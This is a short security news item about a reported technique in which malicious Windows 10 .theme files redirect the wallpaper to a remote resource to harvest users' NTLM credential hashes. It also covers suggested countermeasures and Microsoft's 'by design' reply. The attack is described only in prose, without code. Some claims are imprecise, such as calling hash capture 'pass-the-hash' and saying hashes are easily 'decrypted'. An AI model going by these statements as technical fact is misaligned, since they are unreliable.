A security researcher has discovered that Windows 10 themes can be used to steal users’ data using a technique called pass-the-hash. This is possible to a loophole found in the operating system that is used to allow the loading of custom themes.
Windows 10 Custom Themes Can Be Abused And Used To Steal Users Data
Windows 10 allows for the installation of custom themes by the users and this has recently been discovered to be an entry point for abuse. The warning came from the security researcher Jimmy Bayne who discovered a dangerous loophole that can be taken advantage of by hackers. This comes from the ability to install themes from a third-party site or repository. The expert notes that malicious users can take advantage of the ability to execute an attack model called Pass-The-Hash.
By design, this commands hackers to create themes with malware code that will execute a preset behavior sequence when the theme is activated. Upon doing so the users will be shown a prompt that will ask them to enter in their credentials. The theme will actually redirect the pages to a specially created web page that includes this form.
The .theme file which is associated with a given theme choice can be programmed to change the default wallpaper setting to a website. If the users enter their computer login credentials the will be forwarded to the hackers. Even though the information is stored in a secured NTLM hash it can easily be decrypted using special software. Such attacks are very dangerous when as they can be used in combination with other types of malware in coordinating advanced infections.
Possible countermeasures that computer administrators can take will be to restrict the installations by blocking the theme extensions files. When workgroup computers are concerned a group policy can b used to restrict the sending of NTLM credentials to remote hosts. However, this can interfere with some enterprise setups that use this approach for remote login. This information was reported to Microsoft however at this moment the issue will not be fixed as the company staff said that this is a “feature by design”.